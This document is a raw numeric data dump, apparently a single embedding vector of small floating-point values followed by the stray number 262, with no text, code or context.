-0.01753642037510872, 0.007692480925470591, 0.005842090584337711, 0.019755536690354347, -0.00003776575977099128, 0.019173694774508476, -0.006883992347866297, -0.007929276674985886, -0.02787424996495247, 0.0036263586953282356, -0.005267015192657709, 0.02507329359650612, -0.004678408615291119, -0.025641603395342827, -0.009309457615017891, -0.030986422672867775, 0.008923819288611412, 0.006853547412902117, 0.0036331242881715298, -0.03940282389521599, 0.01012809481471777, 0.011609760113060474, -0.017184609547257423, -0.029958052560687065, -0.012414866127073765, 0.019985565915703773, -0.013226737268269062, -0.0074083260260522366, -0.005442920606583357, 0.037237830460071564, 0.014694871380925179, 0.014437778852880001, 0.0028161786030977964, 0.008876459673047066, -0.0011400026269257069, 0.027075909078121185, 0.022461773827672005, -0.010026611387729645, 0.0003268627915531397, -0.010811420157551765, -0.0270894393324852, -0.010655811056494713, -0.03117585927248001, 0.014018312096595764, 0.009052365086972713, 0.020851561799645424, -0.00807135459035635, -0.021758152171969414, -0.006768977269530296, 0.01148797944188118, 0.03133823350071907, -0.013132018968462944, 0.014897839166224003, -0.01589914783835411, 0.004644580651074648, 0.0038191780913621187, -0.008436696603894234, -0.004502503201365471, 0.0020584322046488523, -0.028550809249281883, 0.006264940369874239, -0.017847638577222824, -0.0240855161100626, -0.0056763337925076485, -0.027928374707698822, -0.012205132283270359, -0.010188985615968704, -0.010175454430282116, -0.0012237268965691328, 0.006352893076837063, -0.00854494608938694, 0.004444995429366827, -0.0071241711266338825, -0.013747688382863998, 0.009038833901286125, 0.021555183455348015, -0.03672364726662636, 0.0007327984785661101, -0.021149247884750366, -0.013788281939923763, 0.005243335850536823, 0.008341978304088116, -0.005957106128334999, -0.012002164497971535, -0.021433403715491295, -0.013910062611103058, 0.02033737674355507, 0.0008981326827779412, 0.015885615721344948, -0.014085968025028706, -0.014491903595626354, -0.007645121775567532, 0.023990798741579056, -0.023463081568479538, -0.016738081350922585, 0.007536872290074825, -0.00957331620156765, -0.025249198079109192, 0.0032305712811648846, -0.012238960713148117, -0.012198367156088352, 0.008754679001867771, 0.006170222070068121, -0.011440619826316833, 0.004323214758187532, 0.01882188394665718, -0.000004648042704502586, -0.015953272581100464, 0.004698705393821001, -0.00030233748839236796, 0.006836633197963238, -0.014816652052104473, 0.0010833408450707793, 0.018185917288064957, 0.03071579895913601, -0.02549275942146778, -0.000015909718058537692, -0.005595146678388119, -0.005422623828053474, 0.017116954550147057, 0.02021559700369835, 0.004986243322491646, -0.006089034955948591, 0.005950340535491705, 0.018212979659438133, 0.014559559524059296, 0.010892607271671295, -0.016900455579161644, -0.015141400508582592, -0.008802038617432117, -0.0045769247226417065, 0.0005315220332704484, -0.002868612064048648, 0.0056763337925076485, 0.006501736119389534, 0.009979251772165298, 0.021108655259013176, -0.010824951343238354, 0.0008524648728780448, -0.0031578412745147943, -0.0013996323104947805, -0.02252942882478237, -0.02503269910812378, -0.01622389629483223, -0.0034673672635108232, 0.031933605670928955, 0.013524423353374004, -0.012753145769238472, 0.01324026845395565, -0.006234495434910059, -0.0014613684033975005, -0.019620224833488464, 0.005997699685394764, -0.010114563629031181, 0.008078119717538357, 0.016738081350922585, 0.0033117583952844143, -0.02668350376188755, 0.013686797581613064, 0.021555183455348015, 0.013869469054043293, -0.004894907586276531, 0.010473140515387058, 0.005419241264462471, 0.00868702307343483, 0.0012567092198878527, -0.00939064472913742, -0.018551260232925415, -0.03182535618543625, 0.004353660158813, -0.017874700948596, 0.0055342563427984715, -0.00466487742960453, -0.013822109438478947, 0.004830634221434593, 0.006549095269292593, 0.03905101120471954, 0.004485588986426592, -0.02577691525220871, -0.005006540101021528, -0.0030986422207206488, 0.010446078144013882, -0.009701861999928951, 0.02857787162065506, 0.005557935684919357, 0.014640746638178825, 0.003337129484862089, 0.008680257946252823, 0.0008292081765830517, 0.016751611605286598, 0.001940034213475883, -0.004353660158813, -0.0017878083745017648, 0.010594921186566353, 0.005378647707402706, 0.02635875530540943, 0.024883856996893883, 0.006599837448447943, 0.0005484360153786838, -0.008220197632908821, -0.01499255746603012, 0.0005294077564030886, -0.002428848296403885, -0.006941500119864941, -0.005101258400827646, -0.009958955459296703, 0.013037300668656826, -0.00891705323010683, 0.017888231202960014, -0.0038665372412651777, -0.031067609786987305, -0.010534030385315418, 0.012759910896420479, 0.0009505660273134708, -0.014356591738760471, 0.009755986742675304, -0.0031510756816715, 0.009525956586003304, 0.008774976246058941, 0.027820125222206116, -0.010973794385790825, 0.016521582379937172, -0.007388029247522354, 0.015872085466980934, -0.000647805689368397, -0.01499255746603012, -0.021013936027884483, 0.011088808998465538, 0.0012651662109419703, -0.017658201977610588, -0.018348291516304016, 0.013551485724747181, -0.01315231528133154, 0.004519416950643063, -0.007996932603418827, 0.02412611059844494, 0.010222813114523888, 0.004326597787439823, 0.0204185638576746, 0.015696179121732712, 0.002504961332306266, -0.0030479002743959427, 0.016372738406062126, -0.003836092073470354, -0.003450453281402588, -0.01779351383447647, -0.0017675115959718823, -0.0062141986563801765, -0.015303774736821651, -0.017671732231974602, -0.0039206622168421745, 0.0011129402555525303, 0.0063562761060893536, -0.012110413983464241, -0.005442920606583357, -0.02321952022612095, 0.00284662377089262, -0.0008600762230344117, 0.003501195227727294, -0.007002390455454588, -0.023408956825733185, 0.0012279554503038526, -0.00669117271900177, 0.023787830024957657, 0.00796987023204565, -0.0069347345270216465, -0.013842406682670116, 0.003416625317186117, 0.01589914783835411, 0.012577240355312824, -0.027820125222206116, 0.017888231202960014, 0.014857245609164238, -0.0005683099152520299, -0.007624824997037649, -0.012049524113535881, -0.0058014970272779465, 0.00868702307343483, 0.013368814252316952, 0.018185917288064957, -0.005060664843767881, -0.007543637882918119, 0.015209056437015533, 0.006393486633896828, -0.02100040577352047, 0.00025984112289734185, 0.01717107929289341, 0.0069347345270216465, -0.0234224870800972, -0.011007621884346008, -0.009783050045371056, -0.009383879601955414, 0.005361733492463827, -0.019160162657499313, 0.01068287342786789, 0.0036601866595447063, 0.002594605553895235, -0.007597762625664473, -0.006535564083606005, -0.012956113554537296, -0.0005708470125682652, -0.010730233043432236, 0.008341978304088116, 0.014275404624640942, -0.016210364177823067, -0.0061972844414412975, -0.016359208151698112, 0.005185828078538179, 0.020242659375071526, 0.0006283546099439263, -0.020202064886689186, 0.02091921865940094, -0.012556943111121655, 0.003447070484980941, 0.007753371261060238, 0.008673491887748241, 0.019160162657499313, 0.020472688600420952, -0.019254881888628006, -0.015750303864479065, -0.031148796901106834, 0.007205358240753412, 0.013098190538585186, -0.010872310027480125, -0.010824951343238354, -0.011609760113060474, -0.031121734529733658, -0.0006507656071335077, -0.011690947227180004, -0.023151863366365433, -0.0015408641193062067, 0.004123630002140999, -0.0065863062627613544, -0.011704478412866592, 0.013774750754237175, -0.0019197374349460006, 0.02198818139731884, 0.030769923701882362, -0.04459879919886589, -0.003781967330724001, -0.019200757145881653, -0.009167380630970001, 0.012759910896420479, 0.0021345450077205896, 0.011271480470895767, -0.005307608749717474, 0.009525956586003304, 0.00291258841753006, -0.011684181168675423, -0.009789815172553062, 0.012624599039554596, -0.0059300437569618225, -0.019444318488240242, 0.021595777943730354, -0.0019467998063191772, 0.003947724588215351, 0.01146768219769001, 0.016900455579161644, 0.012326912954449654, -0.000011793541489169002, -0.008240493945777416, -0.00430291797965765, -0.008260791189968586, 0.007130936719477177, 0.006403635255992413, -0.012144242413341999, -0.021690495312213898, -0.0014782823855057359, 0.01531730592250824, 0.008341978304088116, 0.012137476354837418, 0.015493211336433887, -0.012333679012954235, -0.02984980307519436, -0.012868160381913185, -0.017590545117855072, -0.012624599039554596, -0.020946281030774117, 0.005500428378582001, -0.023327769711613655, 0.008436696603894234, -0.00022643599368166178, 0.0026622614823281765, -0.019160162657499313, -0.008774976246058941, 0.01045960932970047, -0.0020804202649742365, -0.016291551291942596, -0.008971177972853184, 0.021298091858625412, -0.004732533358037472, -0.001306605408899486, -0.010960263200104237, 0.03242072835564613, -0.003504578024148941, -0.012523115612566471, 0.0016787131316959858, -0.03929457440972328, 0.0036263586953282356, -0.007983401417732239, 0.014031843282282352, -0.00852464884519577, 0.00777366803959012, 0.003778584534302354, 0.004834017250686884, 0.008409634232521057, 0.003822560887783766, 0.018497135490179062, -0.004407784901559353, 0.027766000479459763, 0.03772495314478874, -0.012090117670595646, 0.003301610006019473, 0.010574623942375183, -0.007205358240753412, 0.0026741011533886194, 0.029552116990089417, 0.022164087742567062, 0.019660817459225655, -0.011575931683182716, -0.009207974188029766, 0.030363988131284714, 0.018294166773557663, -0.0026690270751714706, -0.0007539409562014043, 0.01598033495247364, 0.020892156288027763, 0.015033151023089886, 0.00119412736967206, 0.005808262620121241, -0.01856479048728943, -0.0005653499974869192, -0.01163005642592907, -0.006535564083606005, 0.005094492807984352, -0.008084885776042938, -0.00029409193666651845, 0.020066753029823303, 0.00004693631126428954, -0.010094267316162586, 0.01886247657239437, 0.008118713274598122, -0.011826259084045887, 0.009025302715599537, -0.0022563256788998842, -0.02928149327635765, 0.022204680368304253, -0.003002232639119029, 0.008822334930300713, 0.006173605099320412, 0.001867304090410471, 0.003421699395403266, 0.0038090297020971775, -0.005375264678150415, 0.0005543559091165662, 0.005551170092076063, -0.028442559763789177, -0.0019197374349460006, 0.001867304090410471, 0.008538180030882359, -0.01115646492689848, -0.010588155128061771, 0.004133778158575296, -0.004996391478925943, -0.00518921110779047, 0.004986243322491646, 0.002824635710567236, -0.02219115011394024, -0.0038631544448435307, 0.003261016448959708, -0.003785350127145648, 0.020459158346056938, 0.030986422672867775, -0.010101032443344593, 0.014356591738760471, 0.0029650218784809113, 0.007584231439977884, -0.013788281939923763, -0.028929682448506355, 0.0019467998063191772, 0.010391953401267529, -0.010939965955913067, 0.01315231528133154, 0.0018554643029347062, -0.016318613663315773, 0.0022630912717431784, 0.007503044325858355, 0.006552478298544884, -0.003144310088828206, 0.0009522574255242944, -0.03293491527438164, 0.007063280791044235, 0.008700554259121418, 0.01700870506465435, 0.007800730410963297, 0.012137476354837418, -0.021176310256123543, 0.009864237159490585, 0.019985565915703773, 0.022948896512389183, -0.018131792545318604, 0.007245951797813177, 0.008558477275073528, -0.020364439114928246, -0.01943078637123108, -0.009728924371302128, -0.008125479333102703, -0.0003355311928316951, 0.005568084307014942, 0.01972847431898117, -0.006068738177418709, 0.009248567745089531, 0.008145775645971298, 0.026697035878896713, -0.010534030385315418, -0.021676965057849884, 0.01791529357433319, -0.021568715572357178, 0.01688692346215248, 0.00027865791344083846, 0.0011019462253898382, 0.011420323513448238, -0.00854494608938694, -0.008281087502837181, 0.008254025131464005, 0.0014106264570727944, -0.011217355728149414, -0.006122862920165062, 0.015560867264866829, 0.030174551531672478, 0.01749582774937153, -0.0004055128083564341, 0.007015921641141176, -0.0034910468384623528, -0.02009381540119648, 0.0012397952377796173, -0.006630282383412123, -0.006735149305313826, 0.002347661182284355, 0.003880068426951766, 0.010642279870808125, 0.00510464096441865, -0.0028060302138328552, -0.010479905642569065, 0.011893915012478828, -0.01717107929289341, 0.007949573919177055, -0.02528979256749153, -0.0009514117264188826, -0.0063562761060893536, -0.018497135490179062, -0.00430291797965765, -0.014478372409939766, 0.0017692029941827059, 0.013422938995063305, 0.013213206082582474, -0.004424698650836945, 0.01922781951725483, 0.002828018506988883, 0.006508501712232828, 0.00535158533602953, 0.0069347345270216465, -0.00022178464860189706, -0.008484055288136005, 0.003042826196178794, 0.008612602017819881, 0.0030631229747086763, 0.008125479333102703, 0.008497586473822594, -0.020405033603310585, 0.007936042733490467, 0.0014038608642295003, -0.005426006857305765, 0.00338617991656065, -0.011359432712197304, -0.008084885776042938, 0.00382932648062706, -0.000496848369948566, 0.008632898330688477, 0.030282801017165184, -0.0028483152855187654, -0.008484055288136005, 0.001139156986027956, 0.02239411696791649, 0.012475755997002125, 0.00854494608938694, -0.01630508340895176, -0.013910062611103058, 0.02240764908492565, 0.005260249599814415, -0.037697892636060715, -0.010987325571477413, 0.0027975733391940594, 0.01976906694471836, -0.0041405437514185905, 0.006349510513246059, -0.007340670097619295, 0.010608452372252941, -0.01874069683253765, 0.002792499028146267, 0.010337828658521175, 0.030905235558748245, -0.007394794840365648, -0.00337095744907856, 0.012299850583076477, -0.0034132422879338264, -0.014221279881894588, 0.0386991985142231, -0.0022191149182617664, 0.009478597901761532, -0.0166027694940567, -0.008267556317150593, -0.013409407809376717, 0.009451535530388355, -0.008267556317150593, 0.015926210209727287, -0.004617518279701471, -0.009728924371302128, 0.00738126365467906, -0.03285372629761696, -0.020161472260951996, 0.0016567249549552798, -0.008551711216568947, 0.015357899479568005, -0.020865093916654587, 0.0035688511561602354, 0.013869469054043293, 0.003988318145275116, 0.0184836033731699, -0.0034453789703547955, -0.006630282383412123, -0.0069347345270216465, -0.03491046652197838, 0.01864597760140896, 0.015926210209727287, 0.011975102126598358, -0.0017049297457560897, -0.0027654366567730904, -0.012387803755700588, -0.00449912017211318, -0.003869920037686825, -0.015872085466980934, -0.0015188759425655007, -0.012326912954449654, 0.04048531875014305, 0.0026402731891721487, -0.006258174777030945, 0.01428893581032753, 0.026954127475619316, -0.0046073696576058865, 0.011690947227180004, -0.0030631229747086763, 0.003348969155922532, 0.0086058359593153, -0.009999549016356468, -0.014830183237791061, 0.0057067787274718285, -0.021108655259013176, -0.019457848742604256, 0.0011374655878171325, -0.007861620746552944, 0.003700780216604471, 0.0028855260461568832, 0.027698343619704247, -0.005283929407596588, -0.004319832194596529, -0.000500231166370213, 0.0038665372412651777, 0.008707320317626, -0.009059131145477295, -0.016413332894444466, 0.0003285541897639632, -0.007333904504776001, 0.0024829732719808817, -0.009363582357764244, -0.003734608180820942, -0.013348517939448357, -0.012286319397389889, -0.000011146052202093415, -0.0029887014534324408, -0.024180235341191292, -0.00982364360243082, 0.03030986338853836, -0.01708989217877388, 0.014965495094656944, 0.0032999187242239714, 0.019823191687464714, -0.01733345352113247, -0.01622389629483223, 0.006782508455216885, 0.03680483251810074, 0.0074556851759552956, 0.03030986338853836, 0.012807270511984825, -0.016643362119793892, -0.018767759203910828, -0.01404537446796894, 0.012699021026492119, 0.004614135250449181, -0.016521582379937172, -0.018713634461164474, -0.03450453281402588, -0.017157547175884247, 0.009810112416744232, -0.007286545354872942, 0.005294077564030886, 0.012441928498446941, -0.007097108755260706, 0.006948265712708235, 0.0036094447132200003, -0.010060438886284828, 0.011000856757164001, 0.033124350011348724, 0.0021971268579363823, 0.01221189834177494, -0.005195976700633764, -0.01828063651919365, -0.01951197348535061, 0.0438951775431633, 0.007509809918701649, 0.015926210209727287, 0.008977944031357765, 0.0006664110696874559, 0.010168688371777534, 0.008815569803118706, 0.00003380154521437362, -0.004982860293239355, -0.0057067787274718285, -0.00027548655634745955, 0.007834558375179768, -0.0007674721418879926, -0.009120021015405655, -0.011975102126598358, -0.0038935996126383543, 0.005906363949179649, -0.007475981954485178, -0.02075684443116188, -0.021514590829610825, -0.004242027644068003, -0.01219160109758377, -0.009316223673522472, -0.012584005482494831, -0.003639889881014824, 0.00868702307343483, 0.007015921641141176, -0.01626448892056942, 0.00008097571117104962, 0.010696404613554478, 0.01610211469233036, -0.02227233722805977, -0.012868160381913185, 0.0037075458094477654, 0.0055647012777626514, 0.006765594240278006, 0.009025302715599537, 0.01688692346215248, -0.012049524113535881, -0.013429705053567886, -0.014776058495044708, 0.017509358003735542, 0.003017455106601119, 0.004309683572500944, -0.01163005642592907, 0.011562400497496128, -0.0013751070946455002, 0.03293491527438164, 0.019417256116867065, 0.008680257946252823, 0.012949347496032715, 0.00139455811586231, -0.008436696603894234, 0.008118713274598122, 0.006735149305313826, -0.008314915932714939, 0.005507193971425295, -0.004888141993433237, -0.012624599039554596, -0.013977718539536, -0.0010934892343357205, 0.0018859094707295299, -0.02434260956943035, -0.01572324149310589, -0.024924449622631073, -0.01138649508357048, 0.015412024222314358, -0.0012431780342012644, -0.005449686199426651, 0.01229308545589447, -0.02597988210618496, -0.0033100671134889126, -0.0017827341798692942, -0.006735149305313826, -0.014708402566611767, -0.023233050480484962, 0.0018097965512424707, -0.005317757371813059, 0.005483514163643122, -0.004211582709103823, 0.006403635255992413, -0.013592079281806946, 0.01654864475131035, -0.006390104070305824, 0.0102092819288373, -0.01259753666818142, 0.0003505423665046692, -0.013328220695257187, -0.0011814419412985444, 0.005943574942648411, 0.005649271421134472, 0.011183527298271656, -0.024396734312176704, -0.023368362337350845, 0.01857832260429859, -0.015601460821926594, 0.019214287400245667, -0.008659960702061653, 0.007915745489299297, 0.021609308198094368, 0.028686121106147766, 0.019999098032712936, -0.03742726892232895, -0.005737224128097296, 0.0034436876885592937, -0.00854494608938694, 0.028523746877908707, -0.00838257186114788, -0.028415497392416, 0.006714852526783943, 0.01163005642592907, -0.014857245609164238, -0.0017522890120744705, 0.001369187142699957, 0.014816652052104473, 0.005182445514947176, 0.00773984007537365, 0.0003395482781343162, 0.024559108540415764, 0.019444318488240242, -0.005879301577806473, -0.00773984007537365, 0.019078975543379784, 0.0012068129144608974, 0.006559243891388178, -0.010784357786178589, 0.0022546343971043825, 0.024477921426296234, 0.009843939915299416, -0.013578548096120358, 0.0011772133875638247, 0.009038833901286125, 0.00569324754178524, 0.009316223673522472, 0.011508275754749775, 0.01428893581032753, -0.022137025371193886, 0.02717062644660473, -0.00111716880928725, 0.010635514743626118, 0.031121734529733658, 0.013964187353849411, -0.0022918451577425003, 0.005700013134628534, -0.02005322277545929, 0.003005615435540676, -0.003039443399757147, 0.004079653415828943, -0.004099950194358826, -0.005815028212964535, 0.002063506282866001, 0.0032525595743209124, 0.0014842023374512792, -0.011745071969926357, -0.005341436713933945, 0.0063562761060893536, 0.02631816267967224, 0.018713634461164474, -0.012387803755700588, 0.012157773599028587, 0.01852419786155224, 0.019011320546269417, 0.01190068107098341, 0.013504126109182835, -0.0020939514506608248, -0.011413557454943657, 0.007036218419671059, -0.015682648867368698, 0.01939019374549389, -0.009749221615493298, -0.026074601337313652, -0.014383654110133648, 0.004377339500933886, -0.00796987023204565, 0.019796129316091537, 0.0007539409562014043, 0.009363582357764244, -0.0050978753715753555, 0.03109467215836048, 0.012462224811315536, 0.014085968025028706, 0.017279328778386116, -0.007516575511544943, -0.0002596296835690737, 0.022989489138126373, 0.011102340184152126, 0.004441612865775824, -0.001001307973638177, 0.003206891706213355, -0.0041405437514185905, 0.00454986235126853, -0.012252491898834705, -0.0009928509825840592, 0.0018047223566100001, -0.010236344300210476, 0.025885164737701416, -0.0004761287127621472, 0.005757520906627178, 0.024748545140028, -0.014884307980537415, 0.003971403930336237, -0.023909611627459526, -0.001940034213475883, -0.009877768345177174 ]
262